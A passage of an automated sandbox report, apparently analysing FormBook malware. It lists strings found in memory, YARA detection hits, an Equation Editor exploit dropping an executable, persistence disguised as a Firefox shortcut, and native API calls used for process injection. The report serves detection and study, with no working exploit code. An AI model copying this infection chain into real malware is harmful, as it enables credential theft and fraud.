          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000007.00000000.2144811362.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2145415051.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000007.00000000.2151899014.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000007.00000000.2147725228.00000000041AD000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
          Source: explorer.exe, 00000007.00000000.2147725228.00000000041AD000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
          Source: explorer.exe, 00000007.00000000.2144811362.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000007.00000000.2144419097.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000007.00000000.2180035893.000000000856E000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2144811362.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
          Source: explorer.exe, 00000007.00000000.2147725228.00000000041AD000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
          Source: explorer.exe, 00000007.00000000.2179041046.000000000842E000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.2180621064.000000000861C000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
          Source: explorer.exe, 00000007.00000000.2179041046.000000000842E000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2389888753.0000000000280000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.2299563843.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2203049931.0000000000330000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2203016993.0000000000300000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 16.2.firefos.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.firefos.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.skypound83892.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.skypound83892.exe.400000.1.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.2389888753.0000000000280000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.2389888753.0000000000280000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.2299563843.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.2299563843.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.2203049931.0000000000330000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2203049931.0000000000330000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.2203016993.0000000000300000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2203016993.0000000000300000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 16.2.firefos.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 16.2.firefos.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 15.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 15.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 15.2.firefos.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 15.2.firefos.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 16.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 16.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.skypound83892.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.skypound83892.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.skypound83892.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.skypound83892.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\skypoundx[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\skypound83892.exeJump to dropped file
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_004181C0 NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00418270 NtReadFile,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_004182F0 NtClose,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_004181BB NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0041826B NtReadFile,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_004182EA NtClose,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0041839D NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009400C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00940048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00940078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009407AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009410D0 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00940060 NtQuerySection,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009401D4 NtSetValueKey,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0094010C NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00941148 NtOpenThread,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093F8CC NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00941930 NtSetContextThread,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093F938 NtWriteFile,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FAB8 NtQueryValueKey,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FA20 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FA50 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FBE8 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FB50 NtCreateKey,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FC30 NtOpenProcess,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00940C40 NtGetContextThread,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FC48 NtSetInformationFile,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00941D80 NtSuspendThread,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FD5C NtEnumerateKey,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FE24 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FFFC NtCreateProcessEx,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021400C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021407AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02140048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02140078 NtResumeThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02140060 NtQuerySection,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021410D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0214010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02141148 NtOpenThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021401D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FBE8 NtQueryVirtualMemory,
